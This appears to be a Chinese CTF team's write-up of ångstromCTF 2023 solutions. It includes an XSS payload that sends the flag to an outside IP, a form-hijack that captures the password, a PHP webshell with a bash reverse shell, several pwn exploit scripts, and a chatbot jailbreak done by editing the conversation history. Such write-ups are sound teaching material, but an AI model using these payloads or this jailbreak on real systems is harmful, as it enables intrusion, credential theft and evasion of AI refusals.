ångstromCTF 2023 WP

WriteUp 11个月前 admin
480 0 0

点击蓝字

ångstromCTF 2023 WP

关注我们



声明

本文作者:CTF战队
本文字数:17248字

阅读时长:约40分钟

附件/链接:点击查看原文下载

本文属于【狼组安全社区】原创奖励计划,未经许可禁止转载


由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,狼组安全团队以及文章作者不为此承担任何责任。

狼组安全团队有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经狼组安全团队允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。



前言



ångstromCTF

星期六, 22 四月 2023, 08:00 — 星期四, 27 四月 2023, 08:00

https://angstromctf.com

相关附件关注公众号回复 angstromctf2023 获取


CTF战队正在招新!

WEB | PWN | RE | MISC | Crypto | IOT


简历投至 [email protected]

ångstromCTF 2023 WP

ångstromCTF 2023 WP




WEB

catch me if you can

题目信息

ångstromCTF 2023 WP
image.png

题解

抓包在返回包里拿flag即可,签到题ångstromCTF 2023 WPactf{y0u_caught_m3!_0101ff9abc2a724814dfd1c85c766afc7fbd88d2cdf747d8d9ddbf12d68ff874}

shortcircuit

题目信息

ångstromCTF 2023 WP
image.png

题解

源代码中存在jsångstromCTF 2023 WP存在一个swap函数

const swap3 = (x) => {
                let t2 = x[3]
                x[3] = x[2]
                x[2] = t2

                t2 = x[1]
                x[1] = x[3]
                x[3] = t2

                                t2 = x[2]
                x[2] = x[1]
                x[1] = t2


                
                t2 = x[0]
                x[0] = x[3]
                x[3] = t2



                return x
            };
a=chunk("7e08250c4aaa9ed206fd7c9e398e2}actf{cl1ent_s1de_sucks_544e67ef12024523398ee02fe7517fffa92516317199e454f4d2bdb04d9e419ccc7", 30);
swap3(a).join("")

将swap函数的逻辑反写,得到flag

directory

题目信息

ångstromCTF 2023 WP
image.png

题解

http://directory.web.actf.co/.html 从1-5000遍历id,第3054个html中得到flagångstromCTF 2023 WP

hallmark

题目信息

ångstromCTF 2023 WP
image.png

题解

用数组绕过判断

cards[id].type = type == "image/svg+xml" ? type : "text/plain";
cards[id].content = type === "image/svg+xml" ? IMAGES[svg || "heart"] : content;

写一个读 flag 页面的 http 请求

<svg xmlns="http://www.w3.org/2000/svg" version="1.1">
<circle cx="100" cy="50" r="40" stroke="black" stroke-width="2" fill="red" />
<script>xmlhttp=new XMLHttpRequest();xmlhttp.withCredentials=true;xmlhttp.onreadystatechange=function(){if(xmlhttp.readyState==4){window.open('http://118.31.164.133:5555/?flag=' + xmlhttp.responseText)}};xmlhttp.open('GET','https://hallmark.web.actf.co/flag',true);xmlhttp.send();</script>
</svg>

数据包,要记得url编码,不然会被解码

PUT /card HTTP/1.1
Host: hallmark.web.actf.co
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Sec-Ch-Ua: "Chromium";v="107", "Not=A?Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Referer: https://hallmark.web.actf.co/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 1385

id=c899ce6a-f5e8-4e42-ae5e-074f9c16c1c5&type[]=image/svg%2bxml&content=%3c%73%76%67%20%78%6d%6c%6e%73%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%30%2f%73%76%67%22%20%76%65%72%73%69%6f%6e%3d%22%31%2e%31%22%3e%0d%0a%20%20%20%3c%63%69%72%63%6c%65%20%63%78%3d%22%31%30%30%22%20%63%79%3d%22%35%30%22%20%72%3d%22%34%30%22%20%73%74%72%6f%6b%65%3d%22%62%6c%61%63%6b%22%20%73%74%72%6f%6b%65%2d%77%69%64%74%68%3d%22%32%22%20%66%69%6c%6c%3d%22%72%65%64%22%20%2f%3e%0d%0a%20%20%20%3c%73%63%72%69%70%74%3e%78%6d%6c%68%74%74%70%3d%6e%65%77%20%58%4d%4c%48%74%74%70%52%65%71%75%65%73%74%28%29%3b%78%6d%6c%68%74%74%70%2e%77%69%74%68%43%72%65%64%65%6e%74%69%61%6c%73%3d%74%72%75%65%3b%78%6d%6c%68%74%74%70%2e%6f%6e%72%65%61%64%79%73%74%61%74%65%63%68%61%6e%67%65%3d%66%75%6e%63%74%69%6f%6e%28%29%7b%69%66%28%78%6d%6c%68%74%74%70%2e%72%65%61%64%79%53%74%61%74%65%3d%3d%34%29%7b%77%69%6e%64%6f%77%2e%6f%70%65%6e%28%27%68%74%74%70%3a%2f%2f%31%31%38%2e%33%31%2e%31%36%34%2e%31%33%33%3a%35%35%35%35%2f%3f%66%6c%61%67%3d%27%20%2b%20%78%6d%6c%68%74%74%70%2e%72%65%73%70%6f%6e%73%65%54%65%78%74%29%7d%7d%3b%78%6d%6c%68%74%74%70%2e%6f%70%65%6e%28%27%47%45%54%27%2c%27%68%74%74%70%73%3a%2f%2f%68%61%6c%6c%6d%61%72%6b%2e%77%65%62%2e%61%63%74%66%2e%63%6f%2f%66%6c%61%67%27%2c%74%72%75%65%29%3b%78%6d%6c%68%74%74%70%2e%73%65%6e%64%28%29%3b%3c%2f%73%63%72%69%70%74%3e%0d%0a%3c%2f%73%76%67%3e

brokenlogin

题目信息

ångstromCTF 2023 WP
image.png

题解

看起来 bot 会输入用户名和密码,在25字节内的代码把它的输入转发出去

if len(request.args["message"]) >= 25:

Admin bot的代码用了Puppeteer库。首先判断输入URL是否满足/^https://brokenlogin.web.actf.co/.*/,满足才能进入功能逻辑。

#https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/RegExp/test

if (!/^https://brokenlogin.web.actf.co/.*/.test(url)) return;

这段代码,admin bot会将flag填入到password表单字段中。最后提交给某个url。

#https://pptr.dev/api/puppeteer.page._eval
await page.$eval(
          "input[name=password]",
          (el, password) => (el.value = password),
          process.env.CHALL_BROKENLOGIN_FLAG
        );

所以关键点在于如何抓到admin bot提交表单中的password字段值 得到flag。

Login page的代码使用flask框架,jinja2模板引擎 用户输入的message参数值会被escape函数转移后,输出到页面。escape函数会将字符& < > ' "转换为HTML实体编码,这里没法XSS。但message值可直接进行模板注入:[https://brokenlogin.web.actf.co/?message={{2*3}}](https://brokenlogin.web.actf.co/?message={{2*3}})

    if "message" in request.args:
        if len(request.args["message"]) >= 25:
            return render_template_string(indexPage, fails=fails)
        
        custom_message = escape(request.args["message"])
    
    return render_template_string(indexPage % custom_message, fails=fails)

XSS

?message={{request.args|safe}}&<script>alert(1)</script>

payload

https://brokenlogin.web.actf.co/?message={{request.args|safe}}&r=%3Cform%20action=%22http://vps/%22%20method=%22POST%22%3E%3Clabel%20for=%22username%22%3EUsername:%20%3C/label%3E%3Cinput%20id=%22username%22%20type=%22text%22%20name=%22username%22%20/%3E%3Cbr%20/%3E%3Cbr%20/%3E%3Clabel%20for=%22password%22%3EPassword:%20%3C/label%3E%3Cinput%20id=%22password%22%20type=%22password%22%20name=%22password%22%20/%3E%3Cbr%20/%3E%3Cbr%20/%3E%3Cinput%20type=%22submit%22%20/%3E%3C/form%3E%3C!--
ångstromCTF 2023 WP
image.png

Celeste Speedrunning Association

题目信息

ångstromCTF 2023 WP
image.png

题解

时间戳溢出 https://mount-tunnel.web.actf.co/play  抓取/play下请求包 点击按钮ångstromCTF 2023 WP可以看到发送了一个时间戳ångstromCTF 2023 WP百度搜时间戳最大值ångstromCTF 2023 WP大致范围内都可以获得flag

ångstromCTF 2023 WP


Celeste Tunneling Association

HOST 头只有一个且值为 “flag.local”,则发送包含 FLAG 值的响应

if num_hosts == 1:
    for name, value in headers:
        if name == b"host" and value == SECRET_SITE:
            await send({
                'type''http.response.body',
                'body': FLAG.encode(),
            })
            return
GET / HTTP/2
Host: flag.local
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://2023.angstromctf.com/
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1
Te: trailers

filestore

题目信息

ångstromCTF 2023 WP
image.png

题解

原装php docker, 打include RCE, burp发包

GET /?+config-create+/&f=../../../../usr/local/lib/php/pearcmd.php&/<?=eval($_GET[1])?>+/tmp/shell.php HTTP/1.1

反弹shell

?f=../../../../tmp/shell.php&1=echo `bash%20%2Dc%20%27bash%20%2Di%20%3E%26%20%2Fdev%2Ftcp%2Fvps%200%3E%261%27`;

然后 /list_uploads 以 admin 权限执行 ls 用环境变量替换直接打,虽然没有chown和chmod但是有cp,cp一个可执行文件然后打 tmp下本身就有可执行文件sh (这个思路感觉是非预期,但是他给的没看太懂)

cp /tmp/sh /tmp/ls;
echo "/bin/cat /flag.txt > /tmp/test" > /tmp/ls;
export PATH=/tmp:$PATH;
/list_uploads;
cat /tmp/test;
ångstromCTF 2023 WP
image.png

Pwn

queue

题目信息

ångstromCTF 2023 WP
image.png

题解

#!/usr/bin/env python3
from pwncli import *
cli_script()


io: tube = gift.io
elf: ELF = gift.elf
libc: ELF = gift.libc

filename  = gift.filename # current filename
is_debug  = gift.debug # is debug or not 
is_remote = gift.remote # is remote or not
gdb_pid   = gift.gdb_pid # gdb pid if debug


pd = ''
for i in range(10,0x20):
    pd += '%' + str(i) + '$p'
sla("today?",pd)

#0x312570243831250x3474737b667463610x75715f74695f6b630x615f74695f6575650x34373964613931360x7d32326234363863
#1%p$81%4ts{ftcauq_ti_kca_ti_eue479da916}22b468c
#4ts{ ftca -> actf{st4
#uq_t i_kc -> ck_it_qu
#a_ti _eue -> eue_it_a
# 479d a916 -> 619ad974
# }22b 468c -> c864b22}
#actf{st4ck_it_queue_it_a619ad974c864b22}
ia()

gaga

题目信息

ångstromCTF 2023 WP
image.png

题解

#!/usr/bin/env python3

from pwncli import *
cli_script()


io: tube = gift.io
elf: ELF = gift.elf
libc: ELF = gift.libc

filename  = gift.filename # current filename
is_debug  = gift.debug # is debug or not 
is_remote = gift.remote # is remote or not
gdb_pid   = gift.gdb_pid # gdb pid if debug


CurrentGadgets.set_find_area(1,0)
pd = flat(
    {
    72:[
    CurrentGadgets.write_by_magic(0x404050,0,0x6873),
    CurrentGadgets.write_by_magic(elf.got.setbuf,libc.sym.setbuf,libc.sym.system),
    CurrentGadgets.ret(),
    CurrentGadgets.pop_rdi_ret(),
    0x404050,
    elf.plt.setbuf
    ]
    }
)

sla('input:',pd)
ia()
#actf{b4by's_f1rst_pwn!_3857ffd6bfdf775e}

widget

题目信息

ångstromCTF 2023 WP
image.png

题解

本地打得通,远程不行,?泄露的libc也没问题… 思路;往栈上写got然后利用 %s泄露got中的libc地址 然后栈溢出控制rbp和rip到地址0x401449处,往bss段写,并会完成栈迁移(leave ret),然后迁移后的栈就是0x401449处可写的…执行rop链,但是远程打不通…

#!/usr/bin/env python3
import subprocess
from pwncli import *
cli_script()


io: tube = gift.io
elf: ELF = gift.elf
libc: ELF = gift.libc

filename  = gift.filename # current filename
is_debug  = gift.debug # is debug or not 
is_remote = gift.remote # is remote or not
gdb_pid   = gift.gdb_pid # gdb pid if debug

if gift.remote:
    libc = ELF("./libc.so.6")
    gift[libc] = libc

def execute_curl_command():
    ru('proof of work: ')
    fxxk = rl()[:-1]
    command = (fxxk)
    output = subprocess.check_output(command, shell=True)
    return output.decode("utf-8").strip()
sla('solution:',execute_curl_command())


sla('Amount: ','48')

sa('Contents: ',flat(
    {
    0:'%10$s',
    16:elf.got.printf,
    40-8:[
    0x404000+0xd00,
    0x401449
    ]
    }
))
ru('Your input: ')
leak_libc = recv_current_libc_addr()
log_address_ex2(leak_libc)
lb = leak_libc - libc.sym.printf
libc.address = lb
log_address_ex2(lb)
sleep(2)

CurrentGadgets.set_find_area(0,1)
s(flat(
    {
    40:[
    CurrentGadgets.execve_chain()
    
    ]
    }
))


ia()


原来是走别的路

#!/usr/bin/env python3
import subprocess
from pwncli import *
cli_script()


io: tube = gift.io
elf: ELF = gift.elf
libc: ELF = gift.libc

filename  = gift.filename # current filename
is_debug  = gift.debug # is debug or not 
is_remote = gift.remote # is remote or not
gdb_pid   = gift.gdb_pid # gdb pid if debug

if gift.remote:
    libc = ELF("./libc.so.6")
    gift[libc] = libc

def execute_curl_command():
    ru('proof of work: ')
    fxxk = rl()[:-1]
    command = (fxxk)
    output = subprocess.check_output(command, shell=True)
    return output.decode("utf-8").strip()
sla('solution:',execute_curl_command())


sla('Amount: ','48')

sa('Contents: ',flat(
    {
    40-8:[
    0x404020+0x90,
    0x40130B,

    ]
    }
))



ia()


slack

本地通了ångstromCTF 2023 WP

#!/usr/bin/env python3

from pwncli import *
cli_script()


io: tube = gift.io
elf: ELF = gift.elf
libc: ELF = gift.libc

filename  = gift.filename # current filename
is_debug  = gift.debug # is debug or not 
is_remote = gift.remote # is remote or not
gdb_pid   = gift.gdb_pid # gdb pid if debug

def attack(retstack,val):
    #%57$
    for i in range(6):
        attack_val = val&0xff
        val = val >> 8
        pd = flat(
        {
            0:['%55$hhn']
        },filler = 'x00'
        )
        sleep(0.02)

        sla('Professional): ',pd)
        pd = flat(
        {
            0:'%' + str(retstack+i&0xff) + 'c' + '%42$hhn'
        },filler = 'x00'
        )
        sla('Professional):',pd)
        pd = flat(
        {
            0:['%55$hhnx0a']
        },filler = 'x00'
        )
        sa('Professional):',pd)
        log_address_ex2(attack_val)
        pd = flat(
        {
            0:'%' + str(attack_val) + 'c' + '%57$hhnx0a'
        },filler = 'x00'
        )
        sa('Professional):',pd)
        



pd = flat(
    {
    0:'%28$p-%21$p'
    },filler = 'x00'
    )
sleep(0.05)
sla('Professional):',pd)
ru('You: ')
leak_stack = int(ru('-')[:-1],16)
attack_stack = leak_stack - 0x180

leak_libc= int(rl()[:-1],16)
log_address_ex2(leak_libc)
lb = leak_libc - 0x29d90
libc.address = lb
log_address_ex2(lb)
sleep(0.05)
pd = flat(
    {
    0:'%' + str(attack_stack&0xffff) + 'c' + '%28$hn'
    },filler = 'x00',length = 13
    )
sa('Professional):',pd)
sleep(1)
#%55$p
pd = flat(
        {
        0:['%55$hhn']
        },filler = 'x00'
    )
sla('Professional):',pd)
sleep(0.05)
retstack = leak_stack - 0x110
pd = flat(
    {
    0:'%' + str(retstack&0xffff) + 'c' + '%42$hn'
    },filler = 'x00'
    )
sa('Professional):',pd)
sleep(0.05)
pd = flat(
        {
        0:['%55$hhn']
        },filler = 'x00'
    )
sla('Professional):',pd)
CurrentGadgets.set_find_area(0,1)

pd = CurrentGadgets.pop_rdi_ret()
attack(retstack,pd)

pd = libc.search(b'/bin/shx00').__next__()
attack(retstack+8,pd)

pd = CurrentGadgets.ret()
attack(retstack+0x10,pd)
pd = libc.sym.system
attack(retstack+0x18,pd)

sl('0')



ia()

Misc

meow

题目信息

ångstromCTF 2023 WP
image.png

题解

nc连上就有flagångstromCTF 2023 WP

Physics HW

题目信息

ångstromCTF 2023 WP
image.png

题解

下载附件能看到这个图片下面有空白的内容ångstromCTF 2023 WP大多数情况下都是lsb隐写ångstromCTF 2023 WP提取R0 G0 B0三个通道ångstromCTF 2023 WP

Admiral Shark

题目信息

ångstromCTF 2023 WP
image.png

题解

题目中只有TCP流量是在内网传输的ångstromCTF 2023 WP追踪TCP流 存在对话ångstromCTF 2023 WP

在第二个流 发现存在一个excel文件ångstromCTF 2023 WP提取该文件,打开excel获得结果ångstromCTF 2023 WP

Simon Says

题目信息

ångstromCTF 2023 WP
image.png

题解

题目是批量修改,提取字符串拼接成新字符串。但是运行一会就会出问题。卡在这里ångstromCTF 2023 WP

from socket import timeout
from pwn import *

HOST = 'challs.actf.co'
PORT = 31402

def combine_strings(str1, str2):
return str1[:3] + str2[-3:]

# 连接到服务器
conn = remote(HOST, PORT)

# 处理数据并发送结果
try:
while True:
data = conn.recvline().decode().strip()
if not data:
break
print(data)

match = re.search(r'of (.*) with the last 3 letters of (.*)', data)
if match:
re_str1 = match.group(1)
re_str2 = match.group(2)
print(re_str1)
print(re_str2)
# 结合两个字符串
new_string = combine_strings(re_str1, re_str2)
print(new_string)
#timeout(1)
# 发送新字符串到服务器
conn.sendline(new_string.encode())


except Exception as e:
print(f"Exception: {e}")
print("Last message from server:")
#data2 = conn.recvline().decode().strip()
print(conn.recvall())

# 关闭连接
conn.close()

优化了很多次代码还是发现不行,使用美国服务器 100M拉满就出了

ångstromCTF 2023 WP

Butter me

题目信息

ångstromCTF 2023 WP
image.png

题解

机器人的对话逻辑可能会参考history,而且这里history是可以修改的,直接管他要flag会被拒绝,然后把他拒绝的内容变成同意,再次要flag即可得到。

ångstromCTF 2023 WP


Reverse

checkers

题目信息

ångstromCTF 2023 WP
image.png

题解

反编译直接打开就有flag

ångstromCTF 2023 WP


zaza

题目信息

ångstromCTF 2023 WP
image.png

题解

共3个关卡,全部通过则输出flagångstromCTF 2023 WP最后一个关卡异或即可得到ångstromCTF 2023 WP

win这里可以输出flagångstromCTF 2023 WPångstromCTF 2023 WP

from pwn import *
p = remote('challs.actf.co',32760)

p.sendlineafter('sheep: ','4919')
p.sendlineafter("you can't: ",'1')
a = 'anextremelycomplicatedkeythatisdefinitelyuselessss'
b = "2& =$!-( <*+*( ?!&$$6,. )' $19 , #9=!1 <*=6 <6;66#"

c = ''
for i in range(len(a)):
    c += chr(ord(a[i])^ord(b[i]))
p.sendlineafter('word?n',c)

p.interactive()
ångstromCTF 2023 WP
image.png

Crypto

ranch

题目信息

ångstromCTF 2023 WP
image.png

题解

凯撒 17位

actf{lo0ks_like_we'll_h4ve_to_try_an0ther_dress1ng_5ef89b3a44901831}

impossible

题目信息

ångstromCTF 2023 WP源代码

#!/usr/local/bin/python

def fake_psi(a, b):
    return [i for i in a if i in b]

def zero_encoding(x, n):
    ret = []

    for i in range(n):
        if (x & 1) == 0:
            ret.append(x | 1)

        x >>= 1

    return ret

def one_encoding(x, n):
    ret = []

    for i in range(n):
        if x & 1:
            ret.append(x)

        x >>= 1

    return ret

print("Supply positive x and y such that x < y and x > y.")
x = int(input("x: "))
y = int(input("y: "))

if len(fake_psi(one_encoding(x, 64), zero_encoding(y, 64))) == 0 and x > y and x > 0 and y > 0:
    print(open("flag.txt").read())

题解

简单的判定,但是可以发现只判断了后64位,我们可以利用这一缺陷去绕过,一个传265,另一个传265-1即可ångstromCTF 2023 WP

Royal Society of Arts

题目信息

ångstromCTF 2023 WP源代码

from Crypto.Util.number import getStrongPrime, bytes_to_long
f = open("flag.txt").read()
m = bytes_to_long(f.encode())
p = getStrongPrime(512)
q = getStrongPrime(512)
n = p*q
e = 65537
c = pow(m,e,n)
print("n =",n)
print("e =",e)
print("c =",c)
print("(p-2)*(q-1) =", (p-2)*(q-1))
print("(p-1)*(q-2) =", (p-1)*(q-2))

题解

简单的公式推导一下就可以分解n,然后解RSA即可

n = 125152237161980107859596658891851084232065907177682165993300073587653109353529564397637482758441209445085460664497151026134819384539887509146955251284230158509195522123739130077725744091649212709410268449632822394998403777113982287135909401792915941770405800840172214125677106752311001755849804716850482011237
e = 65537
c = 40544832072726879770661606103417010618988078158535064967318135325645800905492733782556836821807067038917156891878646364780739241157067824416245546374568847937204678288252116089080688173934638564031950544806463980467254757125934359394683198190255474629179266277601987023393543376811412693043039558487983367289
h1 = 125152237161980107859596658891851084232065907177682165993300073587653109353529564397637482758441209445085460664497151026134819384539887509146955251284230125943565148141498300205893475242956903188936949934637477735897301870046234768439825644866543391610507164360506843171701976641285249754264159339017466738250
h2 = 125152237161980107859596658891851084232065907177682165993300073587653109353529564397637482758441209445085460664497151026134819384539887509146955251284230123577760657520479879758538312798938234126141096433998438004751495264208294710150161381066757910797946636886901614307738041629014360829994204066455759806614
a=n-h1+2
b=2*(n-h2)+4
import gmpy2
p=gmpy2.gcd(b-a,n)
q=n//p
d=gmpy2.invert(e,(p-1)*(q-1))
m=pow(c,d,n)
from Crypto.Util.number import *
print(long_to_bytes(m))
#actf{tw0_equ4ti0ns_in_tw0_unkn0wns_d62507431b7e7087}

Royal Society of Arts 2

题目信息

ångstromCTF 2023 WP源代码

from Crypto.Util.number import getStrongPrime, bytes_to_long, long_to_bytes
f = open("flag.txt").read()
m = bytes_to_long(f.encode())
p = getStrongPrime(512)
q = getStrongPrime(512)
n = p*q
e = 65537
c = pow(m,e,n)
print("n =",n)
print("e =",e)
print("c =",c)

d = pow(e, -1, (p-1)*(q-1))

c = int(input("Text to decrypt: "))

if c == m or b"actf{" in long_to_bytes(pow(c, d, n)):
    print("No flag for you!")
    exit(1)

print("m =", pow(c, d, n))

题解

典型的选择密文攻击

from Crypto.Util.number import *
n = 125599176571600020653591006850671918629969316481963062048627899456165392819660860740063083701116993746821677119724732749154516815660187428871607902333403883531995982511670779222688750122385320108285448513711360492525583823239144738204403791494094189914263158329757646207097685944406086316650210435629015580441
e = 65537
c = 118356699644273181014656096442468434092741953493535637242089038822421604090520338228951532311310670264465550052347866421933804678431771754308403610411364147164144986161358033438786432298384562234382847670449017346123112400553187892435784965521706143303825780409089666411990538839432926212604876110990468222147
def get_M():
    X = 31
    Y = 2245210353507115744853619512763365103513604203252345078552352164656244721761498436382540411511342605064367502059224782489794482885805847835150166633217981938173524890815767043000942837015297824912761101682532115739430712588817915577317506214466354298172138616710257304537044994467111779824460332769762294569
    Z = 1815130072598125153013806999324629484146992932282840740577392431166379221925559013496695934091738262155265245310243
    i = 0
    while True:
        M = (n * i + Z) // X
        if b'actf{' in long_to_bytes(M):
            print(long_to_bytes(M))
            break
get_M()
#actf{rs4_is_sorta_homom0rphic_50c8d344df58322b}

Lazy Lagrange

题目信息

ångstromCTF 2023 WP
image.png

题解

给的是多项式的和,然后mod了M,由于flag字符是可见字符并且测试之后发现”}”是最大的一个字符,将底数设置成127,即可保证mod M不生效并且不会在计算中影响系数a

from pwn import *
def jisuan(o,a0,M):
    p=''
    p+=str(a0)+' '
    for i in range(17):
        o=(o-a0)//M
        a0=o%M
        p+=str(a0)+' '
    return p
M = 127
r=remote('challs.actf.co',32100)
print(r.recv())
r.sendline(b'1')
print(r.recv())
r.sendline(b'0 127')
a0=int(r.recvline())
a1=int(r.recvline())
print(a0,a1)
p=jisuan(a1,a0,M)
print(p)
print(r.recv())
r.sendline(b'2')
print(r.recv())
r.sendline(p.encode())
print(r.recv())
a=[56 ,102 ,102 ,102 ,48 ,99 ,97 ,116 ,48 ,98 ,56 ,125 ,55 ,97 ,55 ,54 ,123 ,54 ]
b=[6 ,5 ,3 ,8 ,7, 1 ,13 ,2 ,10 ,16 ,11 ,17 ,14 ,0 ,15 ,12, 4 ,9]
c=[0]*18
flag=''
for i in range(len(a)):
    c[b[i]]=chr(a[i])
for k in c:
    flag+=k
print(flag)
#actf{f80f6086a77b}





作者



ångstromCTF 2023 WP

CTF战队

ctf.wgpsec.org



扫描关注公众号回复加群

和师傅们一起讨论研究~


WgpSec狼组安全团队

微信号:wgpsec

Twitter:@wgpsec


ångstromCTF 2023 WP
ångstromCTF 2023 WP


原文始发于微信公众号(WgpSec狼组安全团队):ångstromCTF 2023 WP

版权声明:admin 发表于 2023年4月28日 下午3:35。
转载请注明:ångstromCTF 2023 WP | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...